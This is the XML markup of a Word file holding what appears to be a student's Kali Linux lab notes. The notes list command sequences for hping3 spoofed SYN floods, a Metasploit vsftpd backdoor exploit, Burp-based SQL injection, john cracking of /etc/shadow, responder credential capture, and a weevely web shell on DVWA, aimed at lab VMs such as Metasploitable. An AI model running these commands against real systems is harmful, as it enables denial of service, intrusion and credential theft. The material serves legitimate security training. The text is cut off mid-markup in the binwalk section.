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B6CD" w14:textId="69EEA09E" w:rsid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1a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0294BDB8" w14:textId="77777777" w:rsid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327986" w14:textId="4E3AB6C6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apt-get install hping3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6CEA90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hping3 -S 10.0.2.4 -p 80 -c 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236F6AD5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hping3 --traceroute -V -1 10.0.2.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04624307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hping3 --rand-source -c 15000 -d 120 -w 64 -S -p 80 --flood 10.0.2.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B20842" w14:textId="1F3EFA09" w:rsid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hping3 -a 10.0.2.6 -c 15000 -d 120 -w 64 -S -p 80 --flood 10.0.2.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0AFBF8" w14:textId="16713BA1" w:rsid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093D7F" w14:textId="6157F169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1b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618B7717" w14:textId="77777777" w:rsid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32D457" w14:textId="05D54382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apt-get install </w:t>
      </w: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nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0F08DEC2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nmap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10.0.2.4 (find)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62566116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nmap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10.0.2.4 -p 80 (anon ftp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D77411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nmap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10.0.2.4 (open)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328C794F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searchsploit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vsftpd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2.3.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521689F7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msfconsole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(new tab)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B7A066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msfconsole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 search </w:t>
      </w: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vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="30913076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msfconsole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use exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFCFCAD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----------&gt;&gt; show info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20766293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----------&gt;&gt; show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B06030" w14:textId="77777777" w:rsidR="00CE6180" w:rsidRP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----------&gt;&gt; set RHOSTS 10.0.2.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216719E2" w14:textId="494FFB0B" w:rsidR="00CE6180" w:rsidRDefault="00CE6180" w:rsidP="00CE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61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----------&gt;&gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5429ADFD" w14:textId="5E04B3D3" w:rsidR="003B27E8" w:rsidRDefault="003B27E8" w:rsidP="00CE6180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002966" w14:textId="77777777" w:rsidR="003B27E8" w:rsidRPr="003B27E8" w:rsidRDefault="003B27E8" w:rsidP="003B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87F59E" w14:textId="34E0A356" w:rsidR="00CE6180" w:rsidRDefault="00CE6180">
      <w:r>
        <w:t>2a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EE7559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httrack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webhttrack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="48189659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httrack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> https://www.rvce.edu.inf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724CA4F4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httrack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> https://www.rvce.edu.in/index.html +* -r6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01610F91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httrack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> https://www.rvce.edu.in --spider -P proxy.myhost.com:8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039EE8F3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httrack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> --update (update a mirror)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025B5965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httrack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> --continue (continue a mirror)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05812FA0" w14:textId="28E6E399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webhttrack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> (GUI)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB637C1" w14:textId="3585B26B" w:rsidR="00CE6180" w:rsidRDefault="00CE6180" w:rsidP="00CE6180">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="651A7B66" w14:textId="43FCF1AA" w:rsidR="00CE6180" w:rsidRDefault="00CE6180" w:rsidP="00CE6180">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59CFD907" w14:textId="603C130B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2b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480CBC9C" w14:textId="77777777" w:rsidR="00CE6180" w:rsidRDefault="00CE6180" w:rsidP="00CE6180">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BAC7D83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metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> -&gt; cd /var/www/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>mutillidae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nano config.inc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1357D4C6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 xml:space="preserve">replace </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> by owasp10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8A5CAA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Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7611AA17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 xml:space="preserve">Browser -&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>metasploitable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mutillidae</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1EB7275F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owasp10 -&gt; A1 -&gt; SQLi-extract data -&gt; user info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736E3A74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Browser -&gt; preference -&gt; network -&gt; manual proxy -&gt; 127.0.0.1:8080 -&gt; enable ftp &amp; https</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C57743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Burpsuit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> -&gt; Proxy -&gt; intercept on (if off)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407D40BF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 xml:space="preserve">Browser -&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>mutillidae</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> -&gt; random credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2029BF72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select all -&gt; send to intruder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA24D01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Intruder -&gt; positions -&gt; clear -&gt; select name -&gt; add</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79712256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-&gt; payloads -&gt; load -&gt;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/share/wordlist/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>wfuzz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>/injections/SQL.txt -&gt; Start attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043F2A91" w14:textId="2D2F91C9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39</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F888F0" w14:textId="1DAA2C84" w:rsidR="003B27E8" w:rsidRDefault="003B27E8" w:rsidP="00CE6180">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39058BD7" w14:textId="77777777" w:rsidR="003B27E8" w:rsidRDefault="003B27E8" w:rsidP="00CE6180">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30934257" w14:textId="3E487B42" w:rsidR="00CE6180" w:rsidRDefault="00CE6180" w:rsidP="00CE6180">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DAD58A8" w14:textId="4CA93D15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3a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139937E8" w14:textId="77777777" w:rsidR="00CE6180" w:rsidRDefault="00CE6180" w:rsidP="00CE6180">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B76C61B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john</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069ABB99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john --single --format=raw-sha1 file.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791BA27D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john --wordlist=/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/share/john/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>password.lst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> --format=raw-sha1 file.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3435814F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john --incremental file.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AE7CC2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cat /etc/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F4D5C6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lastRenderedPageBreak/>
        <w:t>unshadow /etc/passwd /etc/shadow &gt; file.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B9E8B7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john file.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0521A1E1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john --list=formats</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764BEFB4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 xml:space="preserve"> -r hello</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A37CAB8" w14:textId="78027A9F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passwd hello</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2016CE8D" w14:textId="25FECCB8" w:rsidR="00CE6180" w:rsidRDefault="00CE6180" w:rsidP="00CE6180">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B0082FD" w14:textId="36D2A196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3b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2968D846" w14:textId="77777777" w:rsidR="00CE6180" w:rsidRDefault="00CE6180" w:rsidP="00CE6180">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="363DD0B1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crunch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7BF947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 xml:space="preserve">crunch 2 3 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>someword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3B1716F9" w14:textId="0E41122A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 xml:space="preserve">crunch 4 6 -p hello </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>world !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> (pattern)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71627C25" w14:textId="6A417BB1" w:rsidR="003B27E8" w:rsidRDefault="003B27E8" w:rsidP="00CE6180">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76134323" w14:textId="77777777" w:rsidR="003B27E8" w:rsidRDefault="003B27E8" w:rsidP="00CE6180">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60625E86" w14:textId="38D12621" w:rsidR="00CE6180" w:rsidRDefault="00CE6180" w:rsidP="00CE6180">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AB08599" w14:textId="6E34ABB4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4a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AC04CF" w14:textId="77777777" w:rsidR="00CE6180" w:rsidRDefault="00CE6180" w:rsidP="00CE6180">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10EA2220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macchanger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="012BDBCD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ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0A9C0777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ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> eth0 down</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED7185B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macchanger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> -r eth0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCE1BE9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macchanger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> -m </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>00:d</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>0:70:00:20:69 eth0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A11885B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macchanger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> -s eth0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA8F0F7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macchanger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p eth0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7530E867" w14:textId="6341731B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ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> eth0 update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E9C107" w14:textId="029F0ACE" w:rsidR="00CE6180" w:rsidRDefault="00CE6180" w:rsidP="00CE6180">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A6E2B79" w14:textId="4635F79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4b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7050ABDB" w14:textId="77777777" w:rsidR="00CE6180" w:rsidRDefault="00CE6180" w:rsidP="00CE6180">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61DDD4E3" w14:textId="77777777" w:rsidR="00CE6180" w:rsidRDefault="00CE6180" w:rsidP="00CE618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responder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163CEAB3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responder -I -A eth0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A048D86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responder -I eth0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB625DE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>responder -I -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>wbF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> eth0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D7ADD5" w14:textId="3603C2B8" w:rsidR="00CE6180" w:rsidRDefault="00CE6180" w:rsidP="00CE6180">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/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>cat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/share/responder/logs/HTTP-Basic-ClearText-10.0.2.15.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4951D899" w14:textId="77777777" w:rsidR="003B27E8" w:rsidRDefault="003B27E8" w:rsidP="00CE6180">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75D2E0B7" w14:textId="77777777" w:rsidR="003B27E8" w:rsidRDefault="003B27E8" w:rsidP="00CE6180">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DA6EAE6" w14:textId="078E7A5C" w:rsidR="00CE6180" w:rsidRDefault="00CE6180" w:rsidP="00CE6180">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FF8D82F" w14:textId="5696688D" w:rsidR="00CE6180" w:rsidRDefault="003B27E8" w:rsidP="00CE6180">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>5a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6335C250" w14:textId="63676B00" w:rsidR="003B27E8" w:rsidRDefault="003B27E8" w:rsidP="00CE6180">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="474B3A8D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 install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>weevely</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2C11FE4D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weevely</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> generate password shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4955A9F6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 xml:space="preserve">(Firefox -&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>metasploitable_ip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dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> -&gt; security -&gt; upload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766621F9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(Firefox -&gt; http://10.0.2.4/dvwa/hackable/uploads/shell.php)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473244F8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weevely</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://10.0.2.4/dvwa/hackable/uploads/shell.php password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8CAD24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ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DB301F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system_info</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="64D1DA6B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file_rm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="61B52DCF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file_upload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7EAB5076" w14:textId="650EC9BC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file_download</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="035E2896" w14:textId="4E47BC90" w:rsidR="003B27E8" w:rsidRDefault="003B27E8" w:rsidP="003B27E8">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3119B163" w14:textId="21611B4A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5b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3ABF26" w14:textId="77777777" w:rsidR="003B27E8" w:rsidRDefault="003B27E8" w:rsidP="003B27E8">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21C3C715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proxychains</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6EB945E5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tor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BB5727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service tor status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320B61D7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 xml:space="preserve">service </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>tor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start</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="79B53371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nano /etc/proxychains4.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37837B0D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strict</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>, dynamic, last line 5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A146515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 xml:space="preserve">service </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>tor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> restart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B76BBC9" w14:textId="7F67EF32" w:rsidR="003B27E8" w:rsidRDefault="003B27E8" w:rsidP="003B27E8">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/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tab no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) proxychains4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google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5150412E" w14:textId="77777777" w:rsidR="003B27E8" w:rsidRDefault="003B27E8" w:rsidP="003B27E8">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70C6383A" w14:textId="77777777" w:rsidR="003B27E8" w:rsidRDefault="003B27E8" w:rsidP="003B27E8">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09188B5E" w14:textId="0DA75B0F" w:rsidR="003B27E8" w:rsidRDefault="003B27E8" w:rsidP="003B27E8">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="685D13FB" w14:textId="56ADEE18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6a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6993FC1D" w14:textId="6D3BC5DD" w:rsidR="003B27E8" w:rsidRDefault="003B27E8" w:rsidP="003B27E8">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BAECE97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foremost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C383A38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fdisk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341E3522" w14:textId="5EF4B1F0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foremost -v -q -t jpg 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/dev/sda1 -o downloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5B1B8D" w14:textId="7E3CE87B" w:rsidR="003B27E8" w:rsidRDefault="003B27E8" w:rsidP="003B27E8">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="267481B4" w14:textId="77777777" w:rsidR="003B27E8" w:rsidRDefault="003B27E8" w:rsidP="003B27E8">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="522320CF" w14:textId="77777777" w:rsidR="003B27E8" w:rsidRDefault="003B27E8" w:rsidP="003B27E8">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01AFA50F" w14:textId="5EA0993A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6b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E93B70" w14:textId="77777777" w:rsidR="003B27E8" w:rsidRDefault="003B27E8" w:rsidP="003B27E8">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F99E23F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binwalk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2D896B52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binwalk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> WhatsAppSetup.exe (-B)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE6F9DD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binwalk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
